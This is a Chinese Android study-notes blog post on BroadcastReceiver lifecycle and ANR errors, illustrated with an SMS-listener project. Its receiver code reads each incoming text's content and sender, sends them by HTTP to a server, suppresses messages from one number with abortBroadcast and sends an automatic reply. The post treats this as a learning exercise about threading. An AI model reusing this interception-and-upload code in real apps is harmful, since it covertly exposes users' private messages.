您当前的位置: 首页 > 学无止境 > 心得笔记 网站首页心得笔记
58_广播接受者的生命周期&避免广播接收者的anr
发布时间:2021-03-05 11:33:06编辑:雪饮阅读()
ANR错误
在昨天监听安卓短信接收者的短信并上传保存到服务器中的项目中其实有一个问题。
因为onReceive其实是在主线程上面的,昨天有一处概念错误,认为其不在主线程程。那么网络访问的配置中同样没有注解下面这两个
@TargetApi(Build.VERSION_CODES.GINGERBREAD)
@SuppressLint("NewApi")
但是也能访问成功。
这个稍后再研究。
既然onReceive是在主线程的,那么阻塞时间超过10秒很容易出现anr异常。
这里模拟一个20秒的休眠操作,并打印当前线程名称,然后另外一个设备疯狂给这个项目所部署的设备发送短信。以此来验证这个理论。
则有SmsReceiver.java:
package com.example.smslistener;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.StrictMode;
import android.telephony.SmsManager;
import android.telephony.SmsMessage;
import java.net.HttpURLConnection;
import java.net.URL;
public class SmsReceiver extends BroadcastReceiver {
// 当接受到短信的时候
// android.provider.Telephony.SMS_RECEIVED
@Override
public void onReceive(Context context, Intent intent) {
// onReceive是运行在主线程main中的则阻塞时间超过10秒很容易出现anr异常
System.out.println("本线程名称"+Thread.currentThread().getName());
//阻塞20秒进行测试
try {
Thread.sleep(20000);
} catch (InterruptedException e) {
e.printStackTrace();
}
Object[] pdus = (Object[]) intent.getExtras().get("pdus");
for(Object pdu:pdus){
SmsMessage message = SmsMessage.createFromPdu((byte[])pdu);
String content = message.getMessageBody();
String address = message.getOriginatingAddress();
address=address.replace("+","");
System.out.println("获取到短信内容:"+content);
System.out.println("获取到短信地址:"+address);
if("15555215556".equals(address)){
abortBroadcast();
SmsManager manager = SmsManager.getDefault();
manager.sendTextMessage(address, null, "ni qu siba ,wo yijing xihuan le xxx", null, null);
}
//将监听获取到的接收者用户的接收的短信内容发送到服务器
String path ="http://192.168.5.247:8080/web/SmsServlet?address="+address+"&content="+content;
try {
StrictMode.ThreadPolicy policy=new StrictMode.ThreadPolicy.Builder().permitAll().build();
StrictMode.setThreadPolicy(policy);
URL url = new URL(path);
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("GET");
conn.setConnectTimeout(5000);
System.out.println(conn.getResponseCode());
} catch (Exception e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
}
}
部署到设备后,按照上述测试,可以看到的确出现了ANR错误
并且线程就是main(在日志猫中日志正文中ctrl+f是可以搜索日志关键字的)
那么正确的做法应该是按照之前的经验,放在子线程中进行跑,则
SmsReceiver.java:
package com.example.smslistener;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.os.StrictMode;
import android.telephony.SmsManager;
import android.telephony.SmsMessage;
import java.net.HttpURLConnection;
import java.net.URL;
public class SmsReceiver extends BroadcastReceiver {
// 当接受到短信的时候
// android.provider.Telephony.SMS_RECEIVED
@Override
public void onReceive(Context context, Intent intent) {
// onReceive是运行在主线程main中的则阻塞时间超过10秒很容易出现anr异常
System.out.println("本线程名称"+Thread.currentThread().getName());
Object[] pdus = (Object[]) intent.getExtras().get("pdus");
for(Object pdu:pdus){
SmsMessage message = SmsMessage.createFromPdu((byte[])pdu);
final String content = message.getMessageBody();
final String address = message.getOriginatingAddress().replace("+","");
System.out.println("获取到短信内容:"+content);
System.out.println("获取到短信地址:"+address);
if("15555215556".equals(address)){
abortBroadcast();
SmsManager manager = SmsManager.getDefault();
manager.sendTextMessage(address, null, "ni qu siba ,wo yijing xihuan le xxx", null, null);
}
//将监听获取到的接收者用户的接收的短信内容发送到服务器
new Thread(){
@Override
public void run() {
//阻塞20秒进行测试
try {
Thread.sleep(20000);
} catch (InterruptedException e) {
e.printStackTrace();
}
String path ="http://192.168.5.247:8080/web/SmsServlet?address="+address+"&content="+content;
try {
StrictMode.ThreadPolicy policy=new StrictMode.ThreadPolicy.Builder().permitAll().build();
StrictMode.setThreadPolicy(policy);
URL url = new URL(path);
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("GET");
conn.setConnectTimeout(5000);
System.out.println(conn.getResponseCode());
} catch (Exception e) {
e.printStackTrace();
}
super.run();
}
}.start();
}
}
}
然后现在无论如何疯狂给这个项目所部署的设备发送短信都不会出现ANR错误了。
但据说这样还是会因为系统有可能回收进程,而导致再次导致监听短信无法发送到服务端,据说最完美的方案是做成服务,而并不是一个简单的进程/线程
TargetApi与SuppressLint的注解
上面可以看到主线程中竟然可以不用TargetApi与SuppressLint的注解
也能成功访问网络。
这里建立一个测试项目试试
networktestactivity_main.xml:
<?xml version="1.0" encoding="utf-8"?>
<androidx.constraintlayout.widget.ConstraintLayout xmlns:android="http://schemas.android.com/apk/res/android"
xmlns:app="http://schemas.android.com/apk/res-auto"
xmlns:tools="http://schemas.android.com/tools"
android:layout_width="match_parent"
android:layout_height="match_parent"
tools:context=".MainActivity">
<Button
android:layout_width="wrap_content"
android:layout_height="wrap_content"
android:onClick="sendHttp"
android:text="发送网络请求"
app:layout_constraintBottom_toBottomOf="parent"
app:layout_constraintLeft_toLeftOf="parent"
app:layout_constraintRight_toRightOf="parent"
app:layout_constraintTop_toTopOf="parent"
/>
</androidx.constraintlayout.widget.ConstraintLayout>
networktest MainActivity.xml:
package com.example.networktest;
import androidx.appcompat.app.AppCompatActivity;
import android.os.Bundle;
import android.os.StrictMode;
import android.view.View;
import java.net.HttpURLConnection;
import java.net.URL;
public class MainActivity extends AppCompatActivity {
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
}
public void sendHttp(View v) {
String address="test";
String content="test2";
String path ="http://192.168.5.247:8080/web/SmsServlet?address="+address+"&content="+content;
try {
StrictMode.ThreadPolicy policy=new StrictMode.ThreadPolicy.Builder().permitAll().build();
StrictMode.setThreadPolicy(policy);
URL url = new URL(path);
HttpURLConnection conn = (HttpURLConnection) url.openConnection();
conn.setRequestMethod("GET");
conn.setConnectTimeout(5000);
System.out.println(conn.getResponseCode());
} catch (Exception e) {
e.printStackTrace();
}
}
}
networktest AndroidManifest.xml:
<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
package="com.example.networktest">
<uses-permission android:name="android.permission.INTERNET"/>
<application
android:allowBackup="true"
android:icon="@mipmap/ic_launcher"
android:label="@string/app_name"
android:roundIcon="@mipmap/ic_launcher_round"
android:supportsRtl="true"
android:theme="@style/Theme.NetworkTest"
android:usesCleartextTraffic="true"
>
<activity android:name=".MainActivity">
<intent-filter>
<action android:name="android.intent.action.MAIN" />
<category android:name="android.intent.category.LAUNCHER" />
</intent-filter>
</activity>
</application>
</manifest>
部署到设备上可以成功获得服务器端的响应码
所以这两个注解其实可以不要的,但是在真机上就未必了。
关键字词:ANR,生命周期,android